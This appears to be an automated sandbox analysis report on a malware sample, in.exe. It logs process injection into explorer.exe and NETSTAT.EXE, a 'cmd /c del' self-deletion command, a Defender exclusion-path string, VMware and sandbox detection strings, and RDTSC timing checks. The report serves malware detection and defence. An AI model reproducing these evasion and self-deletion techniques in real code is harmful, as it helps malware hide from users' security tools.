Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\in.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\in.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: in.exe	Virustotal: Detection: 30%
Source: in.exe	Metadefender: Detection: 35%
Source: in.exe	ReversingLabs: Detection: 75%

Source: unknown	Process created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
Source: C:\Users\user\Desktop\in.exe	Process created: C:\Users\user\Desktop\in.exe C:\Users\user\Desktop\in.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\in.exe	Process created: C:\Users\user\Desktop\in.exe C:\Users\user\Desktop\in.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'	Jump to behavior

Source: C:\Users\user\Desktop\in.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: in.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: in.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netstat.pdbGCTL source: in.exe, 00000002.00000002.285944809.0000000001160000.00000040.00000001.sdmp
Source:	Binary string: netstat.pdb source: in.exe, 00000002.00000002.285944809.0000000001160000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: in.exe, 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: in.exe, NETSTAT.EXE

Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041183E push esi; retf	2_2_0041183F
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_004150B7 push ebp; ret	2_2_004150C4
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041C8BB push es; ret	2_2_0041C930
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041533B push esi; retf	2_2_00415342
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B3F2 push eax; ret	2_2_0041B3F8
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B3FB push eax; ret	2_2_0041B462
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B3A5 push eax; ret	2_2_0041B3F8
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B45C push eax; ret	2_2_0041B462
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0040B53D pushad ; retf	2_2_0040B53F
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00414E7E push esp; iretd	2_2_00414E2E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00414E0A push esp; iretd	2_2_00414E2E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0129D0D1 push ecx; ret	2_2_0129D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038ED0D1 push ecx; ret	8_2_038ED0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103183E push esi; retf	8_2_0103183F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_010350B7 push ebp; ret	8_2_010350C4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103C8BB push es; ret	8_2_0103C930
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103533B push esi; retf	8_2_01035342
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B3A5 push eax; ret	8_2_0103B3F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B3F2 push eax; ret	8_2_0103B3F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B3FB push eax; ret	8_2_0103B462
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0102B53D pushad ; retf	8_2_0102B53F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B45C push eax; ret	8_2_0103B462
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01034E0A push esp; iretd	8_2_01034E2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01034E7E push esp; iretd	8_2_01034E2E

Source: initial sample

Static PE information: section name: .text entropy: 7.68910806579

Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: in.exe PID: 6236, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\in.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\in.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 00000000010285E4 second address: 00000000010285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 000000000102896E second address: 0000000001028974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\in.exe

Code function: 2_2_004088A0 rdtsc

2_2_004088A0

Source: C:\Users\user\Desktop\in.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\in.exe TID: 6240	Thread sleep time: -99976s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\in.exe TID: 6300	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4988	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6456	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\in.exe	Thread delayed: delay time: 99976			Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000003.00000000.270058258.0000000008A9D000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.267074134.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000002.506479364.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.249062679.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000002.500083819.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.269655203.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000002.514141205.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.267074134.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.267074134.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.269655203.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000003.00000000.267074134.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\in.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\in.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\in.exe

Code function: 2_2_004088A0 rdtsc

2_2_004088A0

Source: C:\Users\user\Desktop\in.exe

Code function: 2_2_00409B10 LdrLoadDll,

2_2_00409B10

Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01264120 mov eax, dword ptr fs:[00000030h]	2_2_01264120
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01264120 mov eax, dword ptr fs:[00000030h]	2_2_01264120
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01264120 mov eax, dword ptr fs:[00000030h]	2_2_01264120
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01264120 mov eax, dword ptr fs:[00000030h]	2_2_01264120
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01264120 mov ecx, dword ptr fs:[00000030h]	2_2_01264120
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127513A mov eax, dword ptr fs:[00000030h]	2_2_0127513A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127513A mov eax, dword ptr fs:[00000030h]	2_2_0127513A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249100 mov eax, dword ptr fs:[00000030h]	2_2_01249100
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249100 mov eax, dword ptr fs:[00000030h]	2_2_01249100
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249100 mov eax, dword ptr fs:[00000030h]	2_2_01249100
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124C962 mov eax, dword ptr fs:[00000030h]	2_2_0124C962
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124B171 mov eax, dword ptr fs:[00000030h]	2_2_0124B171
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124B171 mov eax, dword ptr fs:[00000030h]	2_2_0124B171
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126B944 mov eax, dword ptr fs:[00000030h]	2_2_0126B944
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126B944 mov eax, dword ptr fs:[00000030h]	2_2_0126B944
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012761A0 mov eax, dword ptr fs:[00000030h]	2_2_012761A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012761A0 mov eax, dword ptr fs:[00000030h]	2_2_012761A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C69A6 mov eax, dword ptr fs:[00000030h]	2_2_012C69A6
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C51BE mov eax, dword ptr fs:[00000030h]	2_2_012C51BE
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C51BE mov eax, dword ptr fs:[00000030h]	2_2_012C51BE
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C51BE mov eax, dword ptr fs:[00000030h]	2_2_012C51BE
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C51BE mov eax, dword ptr fs:[00000030h]	2_2_012C51BE
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013049A4 mov eax, dword ptr fs:[00000030h]	2_2_013049A4
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013049A4 mov eax, dword ptr fs:[00000030h]	2_2_013049A4
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013049A4 mov eax, dword ptr fs:[00000030h]	2_2_013049A4
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013049A4 mov eax, dword ptr fs:[00000030h]	2_2_013049A4
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127A185 mov eax, dword ptr fs:[00000030h]	2_2_0127A185
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126C182 mov eax, dword ptr fs:[00000030h]	2_2_0126C182
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272990 mov eax, dword ptr fs:[00000030h]	2_2_01272990
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012D41E8 mov eax, dword ptr fs:[00000030h]	2_2_012D41E8
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0124B1E1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0124B1E1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0124B1E1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127002D mov eax, dword ptr fs:[00000030h]	2_2_0127002D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127002D mov eax, dword ptr fs:[00000030h]	2_2_0127002D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127002D mov eax, dword ptr fs:[00000030h]	2_2_0127002D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127002D mov eax, dword ptr fs:[00000030h]	2_2_0127002D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127002D mov eax, dword ptr fs:[00000030h]	2_2_0127002D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125B02A mov eax, dword ptr fs:[00000030h]	2_2_0125B02A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125B02A mov eax, dword ptr fs:[00000030h]	2_2_0125B02A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125B02A mov eax, dword ptr fs:[00000030h]	2_2_0125B02A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125B02A mov eax, dword ptr fs:[00000030h]	2_2_0125B02A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01314015 mov eax, dword ptr fs:[00000030h]	2_2_01314015
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01314015 mov eax, dword ptr fs:[00000030h]	2_2_01314015
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C7016 mov eax, dword ptr fs:[00000030h]	2_2_012C7016
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C7016 mov eax, dword ptr fs:[00000030h]	2_2_012C7016
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C7016 mov eax, dword ptr fs:[00000030h]	2_2_012C7016
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01302073 mov eax, dword ptr fs:[00000030h]	2_2_01302073
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01311074 mov eax, dword ptr fs:[00000030h]	2_2_01311074
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01260050 mov eax, dword ptr fs:[00000030h]	2_2_01260050
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01260050 mov eax, dword ptr fs:[00000030h]	2_2_01260050
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012890AF mov eax, dword ptr fs:[00000030h]	2_2_012890AF
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0 mov eax, dword ptr fs:[00000030h]	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0 mov eax, dword ptr fs:[00000030h]	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0 mov eax, dword ptr fs:[00000030h]	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0 mov eax, dword ptr fs:[00000030h]	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0 mov eax, dword ptr fs:[00000030h]	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0 mov eax, dword ptr fs:[00000030h]	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0127F0BF
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127F0BF mov eax, dword ptr fs:[00000030h]	2_2_0127F0BF
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127F0BF mov eax, dword ptr fs:[00000030h]	2_2_0127F0BF
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249080 mov eax, dword ptr fs:[00000030h]	2_2_01249080
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C3884 mov eax, dword ptr fs:[00000030h]	2_2_012C3884
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C3884 mov eax, dword ptr fs:[00000030h]	2_2_012C3884
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012440E1 mov eax, dword ptr fs:[00000030h]	2_2_012440E1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012440E1 mov eax, dword ptr fs:[00000030h]	2_2_012440E1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012440E1 mov eax, dword ptr fs:[00000030h]	2_2_012440E1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012458EC mov eax, dword ptr fs:[00000030h]	2_2_012458EC
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012DB8D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_012DB8D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012DB8D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012DB8D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012DB8D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012DB8D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130131B mov eax, dword ptr fs:[00000030h]	2_2_0130131B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0124DB60
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01273B7A mov eax, dword ptr fs:[00000030h]	2_2_01273B7A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01273B7A mov eax, dword ptr fs:[00000030h]	2_2_01273B7A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124DB40 mov eax, dword ptr fs:[00000030h]	2_2_0124DB40
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01318B58 mov eax, dword ptr fs:[00000030h]	2_2_01318B58
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124F358 mov eax, dword ptr fs:[00000030h]	2_2_0124F358
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01274BAD mov eax, dword ptr fs:[00000030h]	2_2_01274BAD
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01274BAD mov eax, dword ptr fs:[00000030h]	2_2_01274BAD
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01274BAD mov eax, dword ptr fs:[00000030h]	2_2_01274BAD
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01315BA5 mov eax, dword ptr fs:[00000030h]	2_2_01315BA5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01251B8F mov eax, dword ptr fs:[00000030h]	2_2_01251B8F
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01251B8F mov eax, dword ptr fs:[00000030h]	2_2_01251B8F
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012FD380 mov ecx, dword ptr fs:[00000030h]	2_2_012FD380
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272397 mov eax, dword ptr fs:[00000030h]	2_2_01272397
